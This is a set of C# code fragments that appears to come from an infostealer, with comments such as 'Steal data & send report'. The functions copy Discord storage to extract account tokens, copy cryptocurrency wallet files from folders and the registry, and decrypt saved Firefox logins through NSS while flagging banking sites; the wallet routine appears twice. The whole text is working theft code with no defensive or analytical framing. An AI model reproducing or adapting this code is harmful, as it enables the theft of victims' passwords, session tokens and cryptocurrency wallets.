// Steal data & send report public static string Save() { Console.WriteLine("Running passwords recovery..."); if (!Directory.Exists(PasswordsStoreDirectory)) { Directory.CreateDirectory(PasswordsStoreDirectory); } else { try { Filemanager.RecursiveDelete(PasswordsStoreDirectory); } catch { Console.WriteLine("Failed recursive remove directory"); } }; if (Report.CreateReport(PasswordsStoreDirectory)) { return(PasswordsStoreDirectory); } return(""); }
// Get discord tokens public static string[] GetTokens() { List <string> tokens = new List <string>(); try { foreach (string dir in DiscordDirectories) { string directory = Path.Combine(Paths.appdata, dir); string cpdirectory = Path.Combine(Path.GetTempPath(), new DirectoryInfo(directory).Name); if (!Directory.Exists(directory)) { continue; } Filemanager.CopyDirectory(directory, cpdirectory); foreach (string file in Directory.GetFiles(cpdirectory)) { if (!file.EndsWith(".log") && !file.EndsWith(".ldb")) { continue; } string text = File.ReadAllText(file); Match match = TokenRegex.Match(text); if (match.Success) { tokens.Add($"{match.Value} - {TokenState(match.Value)}"); } } Filemanager.RecursiveDelete(cpdirectory); } } catch (Exception ex) { Console.WriteLine(ex); } return(tokens.ToArray()); }
// Write wallet.dat public static void GetWallets(string sSaveDir) { try { Directory.CreateDirectory(sSaveDir); foreach (string[] wallet in sWalletsDirectories) { CopyWalletFromDirectoryTo(sSaveDir, wallet[1], wallet[0]); } foreach (string wallet in sWalletsRegistry) { CopyWalletFromRegistryTo(sSaveDir, wallet); } if (Counter.Wallets == 0) { Filemanager.RecursiveDelete(sSaveDir); } } catch (System.Exception ex) { Logging.Log("Wallets >> Failed collect wallets\n" + ex); } }
// Write wallet.dat public static void GetWallets(string sSaveDir) { try { Directory.CreateDirectory(sSaveDir); foreach (string[] wallet in sWalletsDirectories) { CopyWalletFromDirectoryTo(sSaveDir, wallet[1], wallet[0]); } foreach (string wallet in sWalletsRegistry) { CopyWalletFromRegistryTo(sSaveDir, wallet); } if (Counter.Wallets == 0) { Filemanager.RecursiveDelete(sSaveDir); } } catch { } }
// Get bookmarks from gecko browser public static List <Password> Get(string path) { List <Password> pPasswords = new List <Password>(); // Get firefox default profile directory string profile = GetProfile(path); if (profile == null) { return(pPasswords); } // Copy required files to temp dir string newProfile = CopyRequiredFiles(profile); if (newProfile == null) { return(pPasswords); } try { string JSON = File.ReadAllText(Path.Combine(newProfile, "logins.json")); JSON = Regex.Split(JSON, ",\"logins\":\\[")[1]; JSON = Regex.Split(JSON, ",\"potentiallyVulnerablePasswords\"")[0]; string[] accounts = Regex.Split(JSON, "},"); if (Decryptor.LoadNSS(MozillaPath)) { if (Decryptor.SetProfile(newProfile)) { foreach (string account in accounts) { Match host = FFRegex.hostname.Match(account), user = FFRegex.username.Match(account), pass = FFRegex.password.Match(account); if (host.Success && user.Success && pass.Success) { string hostname = Regex.Split(host.Value, "\"")[3], username = Decryptor.DecryptPassword(Regex.Split(user.Value, "\"")[3]), password = Decryptor.DecryptPassword(Regex.Split(pass.Value, "\"")[3]); Password pPassword = new Password(); pPassword.sUrl = hostname; pPassword.sUsername = username; pPassword.sPassword = password; // Analyze value Banking.ScanData(hostname); Counter.Passwords++; pPasswords.Add(pPassword); } } } Decryptor.UnLoadNSS(); } } catch (Exception ex) { Logging.Log("Firefox >> Failed collect passwords\n" + ex); } Filemanager.RecursiveDelete(newProfile); return(pPasswords); }